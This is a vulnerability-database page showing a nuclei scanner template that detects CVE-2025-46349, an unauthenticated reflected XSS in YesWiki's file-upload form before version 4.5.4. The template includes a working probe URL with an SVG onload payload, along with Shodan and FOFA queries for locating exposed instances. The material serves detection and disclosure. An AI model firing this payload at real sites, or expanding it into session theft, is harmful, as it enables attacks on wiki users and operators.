Lucene search
+L

YesWiki Reflected XSS via File Upload

🗓️ 20 Aug 2026 04:29:23Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

YesWiki before 4.5.4 has reflected XSS via file upload, enabling unauthenticated link-based exploits.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2025-46349
29 Apr 202518:12
circl
cnnvd
CNNVD
YesWiki 跨站脚本漏洞
29 Apr 202500:00
cnnvd
cve
CVE
CVE-2025-46349
29 Apr 202517:11
cve
cvelist
Cvelist
CVE-2025-46349 YesWiki Vulnerable to Unauthenticated Reflected Cross-site Scripting
29 Apr 202517:11
cvelist
euvd
EUVD
EUVD-2025-12615
3 Oct 202520:07
euvd
github
Github Security Blog
YesWiki Vulnerable to Unauthenticated Reflected Cross-site Scripting
29 Apr 202514:38
github
nvd
NVD
CVE-2025-46349
29 Apr 202518:15
nvd
osv
OSV
GHSA-2F8P-QQX2-GWR2 YesWiki Vulnerable to Unauthenticated Reflected Cross-site Scripting
29 Apr 202514:38
osv
ptsecurity
Positive Technologies
PT-2025-18196
29 Apr 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2025-46349
1 May 202517:18
redhatcve
Rows per page
id: CVE-2025-46349

info:
  name: YesWiki Reflected XSS via File Upload
  author: Mahmoud Gamal
  severity: high
  description: |
    YesWiki is a wiki system written in PHP. Prior to version 4.5.4, YesWiki is vulnerable to reflected XSS in the file upload form. This vulnerability allows any malicious unauthenticated user to create a link that can be clicked on by the victim to perform arbitrary actions. This issue has been patched in version 4.5.4.
  impact: |
    Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
  remediation: |
    Update to version 4.5.4 or later.
  reference:
    - https://github.com/YesWiki/yeswiki/security/advisories/GHSA-2f8p-qqx2-gwr2
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46349
  classification:
    cve-id: CVE-2025-46349
    epss-score: 0.0063
    epss-percentile: 0.47501
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
  metadata:
    max-request: 1
    shodan-query: html:"yeswiki"
    fofa-query: body="yeswiki"
  tags: cve,cve2025,xss,yeswiki

http:
  - method: GET
    path:
      - "{{BaseURL}}/?PagePrincipale/upload&file=%22%3E%3Csvg/onload=alert(document.domain)%3E"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Upload form for file \"><svg/onload=alert(document.domain)>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100fed46c3ded898a03e7acadee9bd461f606036377cf5d1e180d8b3d8436b8a5e9022100a6718d215306697e5dfee2f219cd15cad2400f461e5f5094ce8689e253f4147d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 3.16.1 - 7.6
EPSS0.0063
SSVC
14